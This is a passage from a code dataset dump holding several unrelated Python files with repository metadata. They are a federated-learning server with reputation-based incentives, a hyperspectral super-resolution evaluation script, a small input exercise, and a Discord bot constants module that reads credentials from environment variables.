just need to send the message, and keep track for comparison\n self.clients[client_idx].send_message([\"Accept\", self.cal_avg_price(), max(self.hired_px_hist)])\n else:\n self.clients[client_idx].send_message([\"Decline\", self.cal_avg_price(), max(self.hired_px_hist)])\n total_per_round_asking_price += self.clients[client_idx].get_asking_price() \n \n self.used_PR_budget += total_per_round_asking_price\n else:\n for key in (client_visit_arr):\n #Check budget balance and reputation\n asking_px= self.clients[key].get_asking_price() \n # print(f'client {key} has price of {asking_px}')\n if(key in self.client_rep_list.keys()):\n if (self.used_PR_budget + asking_px >= self.PR_budget) and (self.client_rep_list[key][0] >= self.rep_threshold):\n self.used_PR_budget += asking_px\n #reply to clients\n self.hired_px_hist.append(asking_px)\n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), max(self.hired_px_hist)])\n sampled_client_indices.append(key)\n else: \n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), max(self.hired_px_hist)])\n else:\n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), max(self.hired_px_hist)])\n #cold start, not needed in new algorithm\n else:\n # sample clients randommly because don't know who are the clients i.e. 
cold start problem, note: these clients will be addeed during evaluation stage to rep list\n sampled_client_indices = sorted(np.random.choice(a=[i for i in range(self.num_clients)], size=int(num_sampled_clients*self.fraction), replace=False).tolist())\n for idx in sampled_client_indices:\n self.hired_px_hist.append(self.clients[idx].get_asking_price())\n \n return sampled_client_indices\n \n \n \"\"\"Step 2: Selected Client starts training\"\"\"\n def update_selected_clients(self, sampled_client_indices):\n \n # update selected clients\n message = f\"[Round: {str(self._round).zfill(4)}] Start updating selected {len(sampled_client_indices)} clients...!\"\n print(message); logging.info(message)\n del message; gc.collect()\n\n selected_total_size = 0\n for idx in tqdm(sampled_client_indices, leave=False):\n self.clients[idx].client_update()\n selected_total_size += len(self.clients[idx])\n\n message = f\"[Round: {str(self._round).zfill(4)}] ...{len(sampled_client_indices)} clients are selected and updated (with total sample size: {str(selected_total_size)})!\"\n print(message); logging.info(message)\n del message; gc.collect()\n\n return selected_total_size\n \n \"\"\"Step 3: Evaluate the clients and update their reputation\"\"\"\n def evaluate_selected_models(self, sampled_client_indices):\n \"\"\"Call \"client_evaluate\" function of each selected client.\"\"\"\n message = f\"[Round: {str(self._round).zfill(4)}] Evaluate selected {str(len(sampled_client_indices))} clients' models...!\"\n print(message); logging.info(message)\n del message; gc.collect()\n \n #update their reputation and most recent performance\n if self.incentive_type == 'oort':\n #update and clip feedback and blacklist outliers\n for client_id in sampled_client_indices:\n test_loss, test_accuracy = self.clients[client_id].client_evaluate()\n #count will be added in update function\n feedbacks = {'reward': test_accuracy, 'duration':self.clients[client_id].get_time_taken(), 'time_stamp':self._round, 
'count': self.clients[client_id].get_num_selected(), 'status': True}\n self.oort_train_selector.update_client_util(client_id, feedbacks)\n else:\n for idx in sampled_client_indices:\n test_loss, test_accuracy = self.clients[idx].client_evaluate()\n if self.incentive_type == \"RRAFL\" and self._round >= 3:\n self.update_select_client_rep_RRAFL(idx, test_accuracy)\n #else use normal rep update\n self.update_select_client_rep(idx,test_accuracy)\n #update average reputation value of selected clients\n self.avg_rep = sum([self.client_rep_list[idx][0] for idx in sampled_client_indices])/len(sampled_client_indices)\n\n message = f\"[Round: {str(self._round).zfill(4)}] ...finished evaluation of {str(len(sampled_client_indices))} selected clients!\"\n print(message); logging.info(message)\n del message; gc.collect()\n\n \"\"\"Update reputation based on BRS\"\"\"\n def update_select_client_rep(self, idx, test_accuracy ):\n if idx not in self.client_rep_list:\n #[reputation value, alpha, beta, acc] \n self.client_rep_list[idx] = [0.5, 0 , 0 , test_accuracy]\n return\n\n if test_accuracy > self.client_rep_list[idx][3]:\n self.client_rep_list[idx][1] += (2**(self.num_rounds-self._round)) * 1\n else: \n self.client_rep_list[idx][2] += (2**(self.num_rounds-self._round)) * 1\n\n new_rep = (self.client_rep_list[idx][1] + 1) / (self.client_rep_list[idx][2] + self.client_rep_list[idx][1] + 2) \n self.client_rep_list[idx][0] = new_rep\n self.client_rep_list[idx][3] = test_accuracy\n \n def update_select_client_rep_RRAFL(self, idx, test_accuracy):\n #Do contribution measurement first\n curr_grad = self.clients[idx].get_grad() \n client_contrib = calculate_client_contrib(curr_grad, self.global_grad)\n self.clients[idx].update_contrib_list(client_contrib)\n max_contrib = max(self.clients[idx].get_contrib_list())\n z = max(0.001, client_contrib) / max_contrib\n #calculate if client should get selected or not, with loss threshold = -0.01 as set in the paper\n if 
self.client_rep_list[idx][3] - test_accuracy >= -0.01:\n self.clients[idx].inc_num_pass()\n else:\n self.clients[idx].inc_num_fail()\n #gomertz function for incentive calculation\n x = (0.4* self.clients[idx].get_num_pass())-(0.6*self.clients[idx].get_num_fail()) / (0.4* self.clients[idx].get_num_pass())+(0.6*self.clients[idx].get_num_fail())\n y = math.pow(math.e, -1*math.pow(math.e, -5.5*x))\n new_rep = y*z\n\n self.client_rep_list[idx][0] = new_rep\n\n \n #-----------------UTILITY FUNCTIONS----------------------------\n def cal_avg_price(self, rounds=None):\n if len(self.hired_px_hist) == 0:\n return 0\n if rounds == None:\n return (sum(self.hired_px_hist)/len(self.hired_px_hist))\n else:\n return (sum(self.hired_px_hist[:-1])/(len(self.hired_px_hist)-1))\n\n def calculate_utility(self, acc):\n utility = (self.multiplier_g * acc * 100)-self.used_PR_budget\n return utility\n \n #call this action every round to update per round budget\n def set_budget(self):\n self.PR_used_budget_hist.append(self.used_PR_budget)\n print(f\"per round used budget {self.used_PR_budget}\")\n #set incentive type\n if (self._Q) > 0 :\n self.incentive_type = \"ReverseMod\"\n # if self.l2norm != 0:\n remaining_budget = self.PR_budget - self.used_PR_budget\n print(f\"remaining budget {remaining_budget}\")\n self.PR_budget = remaining_budget + self.basic_PR_budget\n self.hire_budget = (self._Q)+(self.opt_bid)-(self._V)\n #Put a cap on hire budget, cannot be more than Per round budget\n if self.hire_budget > self.PR_budget:\n self.hire_budget = self.PR_budget\n if self.hire_budget < 0:\n self.hire_budget = 0\n print(f'hire budget for round {self._round} is {self.hire_budget}')\n else:\n self.incentive_type = \"Reverse\"\n remaining_budget = self.PR_budget-self.used_PR_budget\n print(f\"remaining budget {remaining_budget}\")\n self.PR_budget = remaining_budget + self.basic_PR_budget\n print(f'per round budget for round {self._round} is {self.PR_budget}')\n \n def get_optimal_bid(self, 
clients_bids):\n temp = 0\n for key in clients_bids:\n if key in self.client_rep_list.keys():\n if self.client_rep_list[key][0] >= self.rep_threshold:\n temp += clients_bids[key]\n return temp\n\n \n def set_overall_l2norm(self, l2norm):\n self.l2norm = l2norm\n\n def get_PR_budget_hist(self):\n return self.PR_used_budget_hist\n\n def get_results(self):\n return self.results\n \n def get_Q_hist(self):\n return self._Q_hist\n\n def calculate_Q(self, acc):\n utility = self.calculate_utility(acc)\n self.utility_history.append(utility)\n print(f\"Utility {utility}\")\n \n optimal_improvement_threshold = get_optimal_improvement_threshold(self._round)\n if self._round >= 1:\n actual_improvement = acc - self.results['accuracy'][self._round-1]\n else:\n actual_improvement = 0\n print(f\"optimal improvement is {optimal_improvement_threshold} while current rate is {actual_improvement}\")\n if (actual_improvement <= optimal_improvement_threshold ):\n self._Q = max(0, self._Q + self.opt_bid - self.used_PR_budget)\n else:\n self._Q = max(0, self._Q - self.used_PR_budget)\n print(f'Result Q = {self._Q}')\n self._Q_hist.append(self._Q)\n \n def get_q_square(self):\n q_f_2 = self._Q * self._Q \n return q_f_2\n\n def save_model(self):\n PATH = os.getcwd()\n PATHNAME = os.path.join(PATH,'model.pth')\n torch.save(self.model, PATHNAME)\n \n def get_Q(self):\n return self._Q\n\n def get_utility_history(self):\n return self.utility_history\n \n def calculate_client_jfi(self):\n jfi = calculate_JFI_clients(self.clients, self.client_rep_list)\n print(f\"JFI for {self.incentive_type} is {jfi}\")\n \n def prune_client_tasks(self, clientSampler, sampledClientsRealTemp, numToRealRun, global_virtual_clock):\n\n sampledClientsReal = []\n # 1. 
remove dummy clients that are not available to the end of training\n for virtualClient in sampledClientsRealTemp:\n roundDuration = clientSampler.getCompletionTime(virtualClient,\n batch_size=self.batch_size, upload_epoch=self.local_epochs,\n model_size=65556) * self.clock_factor\n\n if clientSampler.isClientActive(virtualClient, roundDuration + global_virtual_clock):\n sampledClientsReal.append(virtualClient)\n\n # 2. we decide to simulate the wall time and remove 1. stragglers 2. off-line\n completionTimes = []\n virtual_client_clock = {}\n for virtualClient in sampledClientsReal:\n roundDuration = clientSampler.getCompletionTime(virtualClient,\n batch_size=self.batch_size, upload_epoch=self.upload_epoch,\n model_size=self.model_size) * self.clock_factor\n completionTimes.append(roundDuration)\n virtual_client_clock[virtualClient] = roundDuration\n\n # 3. get the top-k completions\n sortedWorkersByCompletion = sorted(range(len(completionTimes)), key=lambda k:completionTimes[k])\n top_k_index = sortedWorkersByCompletion[:numToRealRun]\n clients_to_run = [sampledClientsReal[k] for k in top_k_index]\n\n dummy_clients = [sampledClientsReal[k] for k in sortedWorkersByCompletion[numToRealRun:]]\n round_duration = completionTimes[top_k_index[-1]]\n \n return clients_to_run, dummy_clients, virtual_client_clock, round_duration\n\n \n #---------------------MAIN SERVER FUNCTIONS-------------------------\n #-------------------MODEL RELATED FUNCTIONS-------------------------\n def transmit_model(self, sampled_client_indices=None):\n \"\"\"Send the updated global model to selected/all clients.\"\"\"\n if sampled_client_indices is None:\n # send the global model to all clients before the very first and after the last federated round\n for client in tqdm(self.clients, leave=False):\n client.model = copy.deepcopy(self.model)\n\n message = f\"[Round: {str(self._round).zfill(4)}] ...successfully transmitted models to all {str(len(self.clients))} clients!\"\n print(message); 
logging.info(message)\n del message; gc.collect()\n else:\n # send the global model to selected clients\n # assert self._round != 0\n\n for idx in tqdm(sampled_client_indices, leave=False):\n self.clients[idx].model = copy.deepcopy(self.model)\n \n message = f\"[Round: {str(self._round).zfill(4)}] ...successfully transmitted models to {str(len(sampled_client_indices))} selected clients!\"\n print(message); logging.info(message)\n del message; gc.collect()\n\n\n def average_model(self, sampled_client_indices, coefficients):\n \"\"\"Average the updated and transmitted parameters from each selected client.\"\"\"\n message = f\"[Round: {str(self._round).zfill(4)}] Aggregate updated weights of {len(sampled_client_indices)} clients...!\"\n print(message); logging.info(message)\n del message; gc.collect()\n all_client_grad = []\n averaged_weights = OrderedDict()\n for it, idx in tqdm(enumerate(sampled_client_indices), leave=False):\n local_weights = self.clients[idx].model.state_dict()\n if self.incentive_type == \"FIFL\":\n all_client_grad.append(self.clients[idx].get_grad())\n #time sensitive\n if self.incentive_type == \"Reverse\" or self.incentive_type == \"ReverseMod\":\n time_taken_client = self.clients[idx].get_time_taken()\n if time_taken_client > self.time_required:\n #get back the money spent\n self.used_PR_budget -= self.clients[idx].get_asking_price()\n #skip aggregating for this client if too slow\n continue\n for key in self.model.state_dict().keys():\n if it == 0:\n averaged_weights[key] = coefficients[it] * local_weights[key]\n else:\n averaged_weights[key] += coefficients[it] * local_weights[key]\n self.model.load_state_dict(averaged_weights, strict=False)\n if self.incentive_type == \"FIFL\":\n self.global_grad = np.mean(all_client_grad)\n print(f\"gradient of server is {self.global_grad}\")\n message = f\"[Round: {str(self._round).zfill(4)}] ...updated weights of {len(sampled_client_indices)} clients are successfully averaged!\"\n print(message); 
logging.info(message)\n del message; gc.collect() \n\n def evaluate_global_model(self):\n \"\"\"Evaluate the global model using the global holdout dataset (self.data).\"\"\"\n self.model.eval()\n self.model.to(self.device, non_blocking=True)\n\n test_loss, correct = 0, 0\n with torch.no_grad():\n for data, labels in self.dataloader:\n data, labels = data.float().to(self.device, non_blocking=True), labels.long().to(self.device, non_blocking=True)\n outputs = self.model(data)\n test_loss += eval(self.criterion)()(outputs, labels).item()\n \n predicted = outputs.argmax(dim=1, keepdim=True)\n correct += predicted.eq(labels.view_as(predicted)).sum().item()\n \n if self.device == \"cuda\": torch.cuda.empty_cache()\n # self.model.to(\"cpu\")\n \n test_loss = test_loss / len(self.dataloader)\n test_accuracy = correct / len(self.data)\n return test_loss, test_accuracy\n \n def train_federated_model(self, client_visit_arr, clients_bids):\n \"\"\"Do federated training.\"\"\"\n #reset PR budget\n self.used_PR_budget = 0\n \n \n sampled_client_indices = self.sample_clients(client_visit_arr, clients_bids) \n self.hire_count_now = len(sampled_client_indices)\n\n\n print(f'id of selected clients: {sampled_client_indices}')\n #Clients can choose to accept or not\n \n # send global model to the selected clients, \\omega_n^t = \\omega_m^t\n self.transmit_model(sampled_client_indices)\n \n if len(sampled_client_indices) == 0:\n return sampled_client_indices\n\n # train and update model for selected clients with local dataset\n selected_total_size = self.update_selected_clients(sampled_client_indices)\n\n # evaluate selected clients with local dataset (same as the one used for local update)\n self.evaluate_selected_models(sampled_client_indices)\n\n # print(self.client_rep_list)\n\n # calculate averaging coefficient of weights\n mixing_coefficients = [len(self.clients[idx]) / selected_total_size for idx in sampled_client_indices]\n\n # average each updated model parameters of the 
selected clients and update the global model\n self.average_model(sampled_client_indices, mixing_coefficients)\n\n #free the client after training\n for idx in sampled_client_indices:\n self.clients[idx].set_available()\n \n \n \n def fit(self, r, client_visit_arr, clients_bids):\n \"\"\"Execute the whole process of the federated learning.\"\"\"\n\n self._round = r \n # self.total_bid = sum(clients_bids.values())\n # print(\"total bid is\"+ str(self.total_bid))\n\n self.opt_bid = self.get_optimal_bid(clients_bids)\n print(\"optimal bid is\"+ str(self.opt_bid))\n\n self.train_federated_model(client_visit_arr, clients_bids)\n test_loss, test_accuracy = self.evaluate_global_model()\n\n \n self.results['loss'].append(test_loss)\n self.results['accuracy'].append(test_accuracy)\n \n self.writer.add_scalars(\n 'Loss',\n {f\"[{self.dataset_name}]_{self.model.name} C_{self.fraction}, E_{self.local_epochs}, B_{self.batch_size}, IID_{self.iid}\": test_loss},\n self._round\n )\n self.writer.add_scalars(\n 'Accuracy', \n {f\"[{self.dataset_name}]_{self.model.name} C_{self.fraction}, E_{self.local_epochs}, B_{self.batch_size}, IID_{self.iid}\": test_accuracy},\n self._round\n )\n\n message = f\"[Round: {str(self._round).zfill(4)}] Evaluate global model's performance...!\\\n \\n\\t[Server: {str(self.id) }] ...finished evaluation!\\\n \\n\\t=> Loss: {test_loss:.4f}\\\n \\n\\t=> Accuracy: {100. 
* test_accuracy:.2f}%\\n\" \n print(message); logging.info(message)\n del message; gc.collect()\n \n self.transmit_model()\n #Calculate Q and Calculate the utility yield\n self.calculate_Q(test_accuracy)\n #ONLY FOR GPSS-ALGO\n if self.incentive_type == \"Reverse\" or self.incentive_type == \"ReverseMod\":\n self.set_budget()\n else:\n self.PR_used_budget_hist.append(self.used_PR_budget)\n print(f'PR_budget for Fed {self.id} is {self.PR_budget}')\n \n \n ","repo_name":"xavi0007/FedLearning-oort","sub_path":"src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":41964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"43362144427","text":"\nimport os\nimport datetime\nimport torch\nimport matplotlib.pyplot as plt\nimport multiprocessing\nimport psutil\nimport numpy as np\nfrom PIL import Image\nimport sys\nimport getopt\nfrom network_31 import VSR_CAS\n# from dataset_tst import ImageFolder\n#from torch.utils.tensorboard import SummaryWriter\nfrom collections import OrderedDict\nfrom util import rgb2ycbcr\nimport math\nimport os\nimport scipy.io as sio\nfrom clean_util import para_setting\nfrom scipy.io import loadmat,savemat\nfrom skimage.measure import compare_ssim\n# from util import PSNR\n#########################################################\nchannel = 31\nup_factor = 8\npatch_size = 512\ndelta =3\n#########################################################\n# --------------------------------------------------------------\ndata = sio.loadmat('../data/train/NSSR_P')\nP = data['P']\nP = torch.FloatTensor(P)\nfft_B,fft_BT = para_setting('gaussian_blur',up_factor,[512, 512],delta=delta)\nfft_B = torch.cat( (torch.Tensor(np.real(fft_B)).unsqueeze(2), torch.Tensor(np.imag(fft_B)).unsqueeze(2)) ,2 )\nfft_BT = torch.cat( (torch.Tensor(np.real(fft_BT)).unsqueeze(2), torch.Tensor(np.imag(fft_BT)).unsqueeze(2)) ,2 )\n# --------------------------------------------------------------\ndef 
convert_to_common_model(state_dict):\n new_state_dict = OrderedDict()\n for k, v in state_dict.items():\n if 'module' in k:\n name = k[7:]\n else:\n name = k\n new_state_dict[name] = v\n return new_state_dict\n\npretrained = torch.load('./models/eopch_100500_params.pkl')\nvsr = torch.nn.DataParallel(VSR_CAS(channel0=channel , factor=up_factor , P=P ,patch_size =patch_size ).cuda())\nvsr.load_state_dict(pretrained)\n# test data dir\nLR_dir = './data/CAVE/test/LR_8_gaussian_'+str(delta)\nHR_dir = './data/CAVE/test/HSI'\nRGB_dir = './data/CAVE/test/RGB'\n\ndef PSNR(img1, img2):\n mse_sum = (img1 - img2 ).pow(2)\n mse_loss = mse_sum.mean(2).mean(2) \n mse = mse_sum.mean() #.pow(2).mean()\n if mse < 1.0e-10:\n return 100\n PIXEL_MAX = 1\n # print(mse)\n return mse_loss, 20 * math.log10(PIXEL_MAX / math.sqrt(mse))\ndef compute_sam(im1, im2):\n im1 = np.reshape(im1,(512*512,31))\n im2 = np.reshape(im2,(512*512,31))\n mole = np.sum(np.multiply(im1, im2), axis=1) \n im1_norm = np.sqrt(np.sum(np.square(im1), axis=1))\n im2_norm = np.sqrt(np.sum(np.square(im2), axis=1))\n deno = np.multiply(im1_norm, im2_norm)\n sam = np.rad2deg(np.arccos(((mole+10e-8)/(deno+10e-8)).clip(-1,1)))\n return np.mean(sam)\n\ndef compute_ssim(im1,im2): \n im1 = np.reshape(im1, (512,512,31))\n im2 = np.reshape(im2, (512,512,31))\n n = im1.shape[2]\n ms_ssim = 0.0\n for i in range(n):\n single_ssim = compare_ssim(im1[:,:,i], im2[:,:,i])\n ms_ssim += single_ssim\n return ms_ssim/n\n\ndef compute_ergas(mse, out):\n out = np.reshape(out, (512*512,31))\n out_mean = np.mean(out, axis=0)\n mse = np.reshape(mse, (31, 1))\n out_mean = np.reshape(out_mean, (31, 1))\n ergas = 100/8*np.sqrt(np.mean(mse/out_mean**2)) \n return ergas\n\nimgs = os.listdir(LR_dir)\npsnrs = []\nssims =[]\nsams = []\nergass =[]\npad_LR = torch.nn.ZeroPad2d(1)\npad_RGB = torch.nn.ZeroPad2d(32)\nwith torch.no_grad():\n print('=========={}======'.format(len(imgs)))\n for i in range(len(imgs)):\n \n LR = 
loadmat(os.path.join(LR_dir,imgs[i]))\n LR = torch.FloatTensor(LR['lr']).cuda()\n # LR = pad_LR(LR)\n HR = loadmat(os.path.join(HR_dir, imgs[i]))\n HR = torch.FloatTensor(HR['hsi']).permute(2,0,1).unsqueeze(0).cuda()\n # HR = pad_RGB(HR)\n RGB = loadmat(os.path.join(RGB_dir, imgs[i]))\n RGB = torch.FloatTensor(RGB['rgb']).permute(2, 0, 1).unsqueeze(0).cuda()\n \n res = vsr(LR, RGB)\n res = torch.clamp(res, 0, 1)\n mse, psnr = PSNR(res, HR)\n psnrs.append(psnr)\n res = np.array(res.cpu())\n \n HR = np.array(HR.cpu())\n mse = np.array(mse.cpu())\n sam = compute_sam(res, HR)\n ssim = compute_ssim(res, HR)\n ergas = compute_ergas(mse, HR)\n sams.append(sam)\n ssims.append(ssim)\n ergass.append(ergas)\n fp = open('./quality.txt', 'a')\n fp.write(imgs[i] +'\\t'+ 'PSNR' +'\\t' + 'SAM' +'\\t' + 'SSIM' +'\\t'+ 'ERGAS'+ '\\t' +\n str(psnr) +'\\t' +str(sam)+'\\t'+str(ssim)+'\\t'+str(ergas)+'\\n')\n fp.close()\n print('Image:%s >>> psnr :%f , sam : %f ,ssim : %f , ,ergas : %f'%(imgs[i],psnr,sam,ssim,ergas))\n\n save_path = './results0615/' + 'delta_' + str(delta) + '/' + imgs[i]\n if not os.path.exists('./results0615/' + 'delta_' + str(delta)):\n os.makedirs('./results0615/' + 'delta_' + str(delta))\n savemat(save_path, {'res': res})\n\n\n\n psnrw_mean = sum(psnrs)/len(psnrs)\n sam_mean = sum(sams)/len(sams)\n ssim_mean = sum(ssims)/len(ssims)\n ergas_mean = sum(ergass)/len(ergass)\n print('The mean psnr, sam ,ssim, ergas is %f, %f, %f, %f'%(psnrw_mean,sam_mean,ssim_mean,ergas_mean))\n fp=open('./quality.txt','a')\n fp.write('PSNR_mean' +'\\t'+ 'SAM_mean' +'\\t' + 'SSIM_mean' +'\\t' + 'ERGAS_mean' +\n '\\t' + str(psnrw_mean) + '\\t' + str(sam_mean) +'\\t' + str(ssim_mean) +'\\t'+ str(ergas_mean) + '\\n')\n\n 
fp.close()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"chengerr/Model-Guided-Deep-Hyperspectral-Image-Super-resolution","sub_path":"sf_8_CAVE/tst.py","file_name":"tst.py","file_ext":"py","file_size_in_byte":5322,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"33"} +{"seq_id":"24253255903","text":"import os\n\nclear = lambda: os.system('cls')\nclear()\n\nvetor = []\n\nfor i in range(10):\n num = int(input('Insira um número: '))\n if num < 0:\n vetor.append(0)\n else:\n vetor.append(num)\n\nprint(vetor)\n","repo_name":"marcelopontes1/Estudos-Python-GUPPE","sub_path":"S7/decimo_setimo.py","file_name":"decimo_setimo.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"34312637411","text":"\"\"\"\n# Constants and Variables Module\n\nThis module contains all constants used in the bot.\n\nAll constants are stored in a .env file. The .env file is not included in the repository for security reasons.\nHowever, you can use the .env.example file as a template to create your own .env file.\n\nThis module also contains some mutable variables/constant that are used oftenly in the bot.\n\"\"\"\n\nfrom os import getenv as ge\nfrom subprocess import check_output as chout\nfrom typing import Any, Final, cast\n\nfrom dotenv import load_dotenv as ld\n\n__version__: Final[str] = \"1.0.0\"\n\nld()\n\nDATABASE_PATH = r\"database/database.csv\"\n\n\nANILIST_CLIENT_ID: Final[str] = cast(str, ge(\"ANILIST_CLIENT_ID\"))\n\"\"\"AniList client ID\"\"\"\nANILIST_CLIENT_SECRET: Final[str] = cast(str, ge(\"ANILIST_CLIENT_SECRET\"))\n\"\"\"AniList client secret\"\"\"\nANILIST_REDIRECT_URI: Final[str] = cast(str, ge(\"ANILIST_REDIRECT_URI\"))\n\"\"\"AniList redirect URI\"\"\"\nANILIST_ACCESS_TOKEN: Final[str] = cast(str, ge(\"ANILIST_ACCESS_TOKEN\"))\n\"\"\"AniList access token\"\"\"\nANILIST_OAUTH_REFRESH: Final[str] = cast(str, 
ge(\"ANILIST_OAUTH_REFRESH\"))\n\"\"\"AniList OAuth refresh token\"\"\"\nANILIST_OAUTH_EXPIRY: Final[int] = cast(int, ge(\"ANILIST_OAUTH_EXPIRY\"))\n\"\"\"AniList OAuth expiry time, in seconds\"\"\"\nAUTHOR_USERID: Final[int] = cast(int, ge(\"AUTHOR_USERID\"))\n\"\"\"The bot author's user ID\"\"\"\nAUTHOR_USERNAME: Final[str] = cast(str, ge(\"AUTHOR_USERNAME\"))\n\"\"\"The bot author's username\"\"\"\nBOT_CLIENT_ID: Final[int] = cast(int, ge(\"BOT_CLIENT_ID\"))\n\"\"\"The bot's client ID\"\"\"\nBOT_SUPPORT_SERVER: Final[str] = cast(str, ge(\"BOT_SUPPORT_SERVER\"))\n\"\"\"The bot's support server invite link\"\"\"\nBOT_TOKEN: Final[str] = cast(str, ge(\"BOT_TOKEN\"))\n\"\"\"The bot's token\"\"\"\nCLUB_ID: Final[int] = cast(int, ge(\"CLUB_ID\"))\n\"\"\"MyAnimeList club ID\"\"\"\nDBGG_API_TOKEN: Final[str] = cast(str, ge(\"DBGG_API_TOKEN\"))\n\"\"\"Discord Bots API token\"\"\"\nDBL_API_TOKEN: Final[str] = cast(str, ge(\"DBL_API_TOKEN\"))\n\"\"\"Discord Bot List API token\"\"\"\nEXCHANGERATE_API_KEY: Final[str] = cast(str, ge(\"EXCHANGERATE_API_KEY\"))\n\"\"\"ExchangeRateAPI key\"\"\"\nINFINITY_API_TOKEN: Final[str] = cast(str, ge(\"INFINITY_API_TOKEN\"))\n\"\"\"Infinity Bots API token\"\"\"\nLASTFM_API_KEY: Final[str] = cast(str, ge(\"LASTFM_API_KEY\"))\n\"\"\"Last.fm API key\"\"\"\nMYANIMELIST_CLIENT_ID: Final[str] = cast(str, ge(\"MYANIMELIST_CLIENT_ID\"))\n\"\"\"MyAnimeList client ID\"\"\"\nRAWG_API_KEY: Final[str] = cast(str, ge(\"RAWG_API_KEY\"))\n\"\"\"RAWG API key\"\"\"\nSENTRY_DSN: Final[str] = cast(str, ge(\"SENTRY_DSN\"))\n\"\"\"Sentry DSN\"\"\"\nSHIKIMORI_CLIENT_ID: Final[str] = cast(str, ge(\"SHIKIMORI_CLIENT_ID\"))\n\"\"\"Shikimori client ID\"\"\"\nSHIKIMORI_CLIENT_SECRET: Final[str] = cast(str, ge(\"SHIKIMORI_CLIENT_SECRET\"))\n\"\"\"Shikimori client secret\"\"\"\nSHIKIMORI_APPLICATION_NAME: Final[str] = cast(\n str, ge(\"SHIKIMORI_APPLICATION_NAME\"))\n\"\"\"Shikimori application name\"\"\"\nSIMKL_CLIENT_ID: Final[str] = cast(str, 
ge(\"SIMKL_CLIENT_ID\"))\n\"\"\"SIMKL client ID\"\"\"\nSPOTIFY_CLIENT_ID: Final[str] = cast(str, ge(\"SPOTIFY_CLIENT_ID\"))\n\"\"\"Spotify client ID\"\"\"\nSPOTIFY_CLIENT_SECRET: Final[str] = cast(str, ge(\"SPOTIFY_CLIENT_SECRET\"))\n\"\"\"Spotify client secret\"\"\"\nTMDB_API_KEY: Final[str] = cast(str, ge(\"TMDB_API_KEY\"))\n\"\"\"TMDB API key\"\"\"\nTMDB_API_VERSION: Final[int] = cast(int, ge(\"TMDB_API_VERSION\"))\n\"\"\"TMDB API version\"\"\"\nTOPGG_API_TOKEN: Final[str] = cast(str, ge(\"TOPGG_API_TOKEN\"))\n\"\"\"Top.gg API token\"\"\"\nTRAKT_API_VERSION: Final[int] = cast(int, ge(\"TRAKT_API_VERSION\"))\n\"\"\"Trakt API version\"\"\"\nTRAKT_CLIENT_ID: Final[str] = cast(str, ge(\"TRAKT_CLIENT_ID\"))\n\"\"\"Trakt client ID\"\"\"\nVERIFICATION_SERVER: Final[int] = cast(int, ge(\"VERIFICATION_SERVER\"))\n\"\"\"Verification server ID\"\"\"\nVERIFIED_ROLE: Final[int] = cast(int, ge(\"VERIFIED_ROLE\"))\n\"\"\"Verified role ID\"\"\"\n\nEMOJI_ATTENTIVE: Final[str] = cast(str, ge(\"EMOJI_ATTENTIVE\"))\n\"\"\"The attentive emoji\"\"\"\nEMOJI_DOUBTING: Final[str] = cast(str, ge(\"EMOJI_DOUBTING\"))\n\"\"\"The doubting emoji\"\"\"\nEMOJI_FORBIDDEN: Final[str] = cast(str, ge(\"EMOJI_FORBIDDEN\"))\n\"\"\"The forbidden emoji\"\"\"\nEMOJI_SUCCESS: Final[str] = cast(str, ge(\"EMOJI_SUCCESS\"))\n\"\"\"The success emoji\"\"\"\nEMOJI_UNEXPECTED_ERROR: Final[str] = cast(str, ge(\"EMOJI_UNEXPECTED_ERROR\"))\n\"\"\"The unexpected error emoji\"\"\"\nEMOJI_USER_ERROR: Final[str] = cast(str, ge(\"EMOJI_USER_ERROR\"))\n\"\"\"The user error emoji\"\"\"\n\nLANGUAGE_CODE: Final[str] = cast(str, ge(\"LANGUAGE_CODE\"))\n\"\"\"Default language code\"\"\"\n\n\ndef get_git_revision_hash() -> str:\n \"\"\"\n Get the current git revision hash\n\n Returns:\n str: The current git revision hash\n \"\"\"\n return chout([\"git\", \"rev-parse\", \"HEAD\"]).decode(\"ascii\").strip()\n\n\ndef get_git_revision_short_hash() -> str:\n \"\"\"\n Get the current git revision short hash\n\n Returns:\n str: The 
current git revision short hash\n \"\"\"\n return chout([\"git\", \"rev-parse\", \"--short\", \"HEAD\"]\n ).decode(\"ascii\").strip()\n\n\ndef get_git_remote_url() -> str:\n \"\"\"\n Get the URL of the origin remote\n\n Returns:\n str: The URL of the origin remote\n \"\"\"\n output = chout([\"git\", \"remote\", \"get-url\", \"origin\"]).decode(\"utf-8\")\n output = output.strip()\n return output\n\n\ndef get_current_git_branch() -> str:\n \"\"\"\n Get the current git branch\n\n Returns:\n str: The current git branch\n \"\"\"\n output = chout([\"git\", \"branch\", \"--show-current\"]).decode(\"utf-8\")\n output = output.strip()\n return output\n\n\n# Call the get_current_git_branch() funct\n\n\nGIT_REMOTE = get_git_remote_url()\n\"\"\"The git remote URL\"\"\"\nGIT_BRANCH = get_current_git_branch()\n\"\"\"The git branch\"\"\"\nGIT_COMMIT_HASH = get_git_revision_hash()\n\"\"\"The git revision hash\"\"\"\nGT_HSH = get_git_revision_short_hash()\n\"\"\"The git revision short hash\"\"\"\n\nUSER_AGENT: Final[\n str\n] = f\"RyuuzakiRyuusei/1.0 ({GIT_REMOTE}/{GT_HSH}; branch:{GIT_BRANCH}; author:{AUTHOR_USERNAME}:{AUTHOR_USERID}; https://discord.com/users/{BOT_CLIENT_ID})\"\n\"\"\"The user agent\"\"\"\n\n# =============================================================================\n# About Bot\n\nAUTHOR_USER_URL = f\"https://discord.com/users/{AUTHOR_USERID}\"\n\"\"\"The bot author's user URL\"\"\"\n\nBOT_DATA: dict[str, Any] = {\n \"server_members\": {}\n}\n\"\"\"Dynamic bot data\"\"\"\n\n# =============================================================================\n# Declined GDPR notice\n\nDECLINED_GDPR: Final[\n str\n] = \"\"\"## You have not accepted the Privacy Policy!\nUnfortunately, we cannot register you without your consent. 
